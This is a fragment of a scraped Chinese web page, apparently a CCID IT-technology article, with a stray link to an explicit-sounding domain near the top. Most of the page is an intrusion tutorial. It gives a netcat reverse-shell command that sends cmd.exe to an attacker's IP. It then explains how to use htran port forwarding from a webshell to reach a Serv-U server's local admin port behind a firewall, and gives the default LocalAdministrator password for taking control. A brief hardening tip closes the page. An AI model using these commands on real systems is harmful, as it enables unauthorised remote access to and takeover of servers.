IT
技术 
- 赛迪网
IT技术 - 赛迪网" href="http://standard.eroticnastyteen.com/feed//sv/pifu/pifuke/" />
IT技术 - 赛迪网这时目标主机就成了一台telnet服务器,你可以telnet上目标服务器的23端口.
反向连接:假设你的IP是202.96.209.168
1.先在自己的机器上运行(你要有一个外部IP):nc -vv -lp 99
2.在目标机器上运行 nc -e cmd.exe 202.96.209.168 99
在你的机器上就会得到一个目标机器的具有管理员权限的shell
如果对方进行了端口过滤或者设置了防火墙的保护( 这种保护不限制反弹连接,如果限制的话就要换别的方法)可以用TCP SOCKET转发来实现。
打个比方:
我的机器为 A;
我要测试的机器为 B[不允许正面连接];
我已经在B上得到呢一个SHELL[只要guest的就行呢]?
我们可以这样连上对方的43958:
I:我在本地监听二个端口23和56
23是等待B来连接的;
56是等待我来连接的;
II:B连接我监听的23,同时转发到本地的43958
这样管道就建好呢~对方的防火墙就拿我们没有办法呢?
此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56用户localAdministrator,密码#l@$ak#.lk;0@P。
具体实施方法
假设你的IP是 202.96.209.168
1.在你自己的机器上运行 htran.exe -listen 23 56;
2.此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P;
3。在目标机器上运行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23
如果不能在webshell下直接运行,可以写一个asp脚本来执行,内容如下:
|
执行connect.asp,如果出来一片空白,没提示什么错误,现在你应该可以管理目标服务器的Serv-U了,余下的事情就看您自由发挥了。htran.exe是一个多线程包转发工具,可以到红盟下载
防止方法
自己给Serv-U打补丁,改变默认端口及管理密码。修改 ServUAdmin.exe、ServUDaemon.exe这两个文件,改端口只要在ServUDaemon.ini文件[GLOBAL]选项中加入LocalSetupPortNo=12345即可
很遗憾,在Serv-U的最新版本Serv-U 5.2.0.0中依然没有任何改变,默认的管理端口及密码还是原来的。(t005)
| [ ] 字体[ 大中小 ] [ 打印 ] [ ] [ 推荐给朋友 ] |
|
||